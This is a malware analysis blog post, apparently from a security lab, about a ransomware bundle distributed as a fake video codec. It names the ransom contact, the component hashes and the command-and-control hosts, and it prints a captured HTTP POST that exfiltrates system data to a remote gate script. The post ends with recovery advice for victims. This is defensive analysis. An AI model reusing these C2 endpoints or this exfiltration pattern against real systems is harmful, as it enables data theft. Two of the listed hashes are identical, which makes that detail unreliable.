I recently got an important clue how the ransom exchange takes place between a victim and cyber criminals. One of readers who became a victim of this ransomware dropped an email to the author at the address otrazhenie_zla@mail.ru for his files to be recovered. This was the response by the author:
"Transfer into account pay pal 50 dollars here email pay pal otrazhenie_zla@mail.ru'
Interestingly, instead of asking him for the standard $10 ransom (as mentioned in his earlier message) he asked him for $50 - typical criminal mentality, isn't it? Unfortunately his greed doesn't end here. This malware instance came bundled in a fake 'SWF video codec' file. Upon execution, this setup file installs three different pieces of malware on the victim machine including this ransomware.
1. 5f9927ee59b4881a2ce8634332f63fa8
Trojan Encoder, the one that encrypts the user file and asks for ransom in return.
2. 010d7b79d002d747f420a7880f89ee38
A password stealing Trojan that uploads user personal information on a remote command and control server (antivirusubdate.no-ip.biz) using an obfuscated protocol on TCP port 3460.
3.010d7b79d002d747f420a7880f89ee38
The last component fetches important system information like running processes, installed windows patches, the machine's netbios name, etc., and uploads it to a remote server updatecodec.freehostia.com. This malware doesn't try to install itself permanently on the infected system so my best guess is that its sole purpose is to register zombie machines with their command and control server.
Here is the outbound communication generated by this last piece:
System information is uploaded via HTTP POST in encoded form.
POST /gate/gate.php HTTP/1.0
Host: updatecodec.freehostia.com
Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; InfoPath.1)
Content-Length: 4042
a=&b=&d=&c=UDNNTAAAAAD2CQAAEQAAAAAAAAAIAAAAHQwXChuMjkQSAAAAAAAAABAAAAAqCAIAAgAOAAoA
NAAXAKoBEwAAAAAAAACkAAAApAAAAAMAAAA3NjQ4Ny02NDUtMDIxNDk0MS0yMzAxNwAuAAAA
QTIyLTAwMDAxAAAAAAAAAGx+5EzmkF4U7a3aFQ6iAQAAAAAAPH6iSfwWCAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAA1NjIyMAAAAAAAAAAaGAAAuMjkSIAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAOX66RcUAAAAAAAAAAQAAAAezQ4AAAAAAAAAAAAgAAAAVXBkYXRl
IGZvciBXaW5kb3dzIFhQIChLQjkxMTE2NCkBAAAAAAAAAAEAAAAxAAAAAAAAAAApAAAAU2Vj
dXJpdHkgVXBkYXRlIGZvciBXaW5kb3dzIFhQIChLQjkyMTg4MykBAAAAAAAAAAEAAAAxAAAA
.......
So what we see here is that a malware component encrypts user files and asks for ransom money, and at the same time other components start stealing the user's personal information. This multi-layered malware installation is another strong evidence to support my BotnetWeb theory. Here is my advice for the victims of this malware pack.
Step 1:
Recover your file using recovery tool provided by Dr.Web as mentioned in Part 1
Step 2:
Change all login credentials which were exchanged on the infected system.
Step 3:
Backup your data files and re-image the infected machine.
Atif Mushtaq @ FireEye Malware Intelligence Lab
Question/Comments : research SHIFT-2 fireeye DOT COM
so, how long until those websites get shut down?
Posted by: joe blow | 2009.06.08 at 03:14 PM